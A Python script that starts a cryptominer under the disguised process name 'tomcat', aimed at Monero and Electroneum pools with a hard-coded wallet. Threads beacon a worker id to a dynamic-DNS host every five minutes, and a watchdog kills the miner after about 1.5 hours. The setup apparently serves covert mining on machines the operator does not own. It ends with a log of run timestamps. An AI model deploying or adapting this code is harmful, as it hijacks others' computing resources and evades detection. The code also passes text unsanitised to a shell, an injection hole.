import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:05.000795
#2018-02-17 15:55:08.140532
#2018-02-17 17:43:05.739258
#2018-02-17 19:29:01.583642
#2018-02-17 21:18:05.835886
#2018-02-17 23:01:06.304346
#2018-02-18 00:50:05.601419
#2018-02-18 02:39:05.104267
#2018-02-18 04:26:07.256081
#2018-02-18 06:17:07.123237
#2018-02-18 08:08:03.760933
#2018-02-18 09:54:07.379547
#2018-02-18 11:41:06.230613
#2018-02-18 13:26:04.258334
#2018-02-18 15:16:03.520277
#2018-02-18 17:05:05.926278
#2018-02-18 18:51:07.118099
#2018-02-18 20:38:06.765879
#2018-02-18 22:24:04.129218
#2018-02-19 00:13:05.314608
#2018-02-19 01:59:03.563322
#2018-02-19 03:46:01.856311
#2018-02-19 05:30:08.227866
#2018-02-19 07:17:03.533913
#2018-02-19 09:06:07.922532
#2018-02-19 10:54:07.294232
#2018-02-19 12:43:04.200057
#2018-02-19 14:29:01.726583
#2018-02-19 16:17:07.977367
#2018-02-19 18:03:05.979375
#2018-02-19 19:51:06.816185
#2018-02-19 21:40:08.180678
#2018-02-19 23:26:05.702232
#2018-02-20 01:12:05.025058
#2018-02-20 03:02:07.812358
#2018-02-20 04:51:03.864347
#2018-02-20 06:34:05.845125
#2018-02-20 08:19:06.131254
#2018-02-20 10:05:01.419357
#2018-02-20 11:50:01.479123
#2018-02-20 13:37:08.126931
#2018-02-20 15:20:07.808339
#2018-02-20 17:07:07.705777
#2018-02-20 18:57:08.996737
#2018-02-20 20:46:01.941744
#2018-02-20 22:31:04.254533
#2018-02-21 00:12:05.947263
#2018-02-21 01:58:02.092764
#2018-02-21 03:47:01.264178
#2018-02-21 05:35:07.826093
#2018-02-21 07:24:17.066540
#2018-02-21 09:09:04.954591
#2018-02-21 10:58:08.584508
#2018-02-21 12:44:08.348606
#2018-02-21 14:33:08.272342
#2018-02-21 16:21:09.981684
#2018-02-21 18:13:09.671397
#2018-02-21 20:00:01.460360
#2018-02-21 21:48:03.827514
#2018-02-21 23:31:07.831212
#2018-02-22 01:19:06.062354
#2018-02-22 03:09:06.227481
#2018-02-22 04:54:07.200574
#2018-02-22 06:39:06.841289
#2018-02-22 08:28:01.391251
#2018-02-22 10:14:07.504543
#2018-02-22 11:58:07.983512
#2018-02-22 13:44:01.733928
#2018-02-22 15:33:05.599036
#2018-02-22 17:19:06.086296
#2018-02-22 19:08:01.584730
#2018-02-22 21:01:08.587074
#2018-02-22 22:46:07.360907
#2018-02-23 00:33:06.753076
#2018-02-23 02:19:01.523576
#2018-02-23 04:06:06.905649
#2018-02-23 05:53:07.915348
#2018-02-23 07:42:05.594024
#2018-02-23 09:44:08.149003
#2018-02-23 11:51:03.844807
#2018-02-23 13:40:04.828129
#2018-02-23 15:28:08.461657
#2018-02-23 17:19:05.125634
#2018-02-23 19:05:04.195052
#2018-02-23 20:51:04.822300
#2018-02-23 22:37:03.703880
#2018-02-24 00:23:05.568188
#2018-02-24 02:15:04.063423
#2018-02-24 04:06:07.575514
#2018-02-24 05:54:06.918130
#2018-02-24 07:42:08.081644
#2018-02-24 09:27:06.341521
#2018-02-24 11:20:07.855827
#2018-02-24 13:09:02.073337
#2018-02-24 14:58:05.459633
#2018-02-24 16:48:04.490070
#2018-02-24 18:36:05.870501
#2018-02-24 20:25:01.856862
#2018-02-24 22:21:01.349142
#2018-02-25 02:31:05.117275
#2018-02-25 06:11:05.414683
#2018-02-25 11:39:03.844694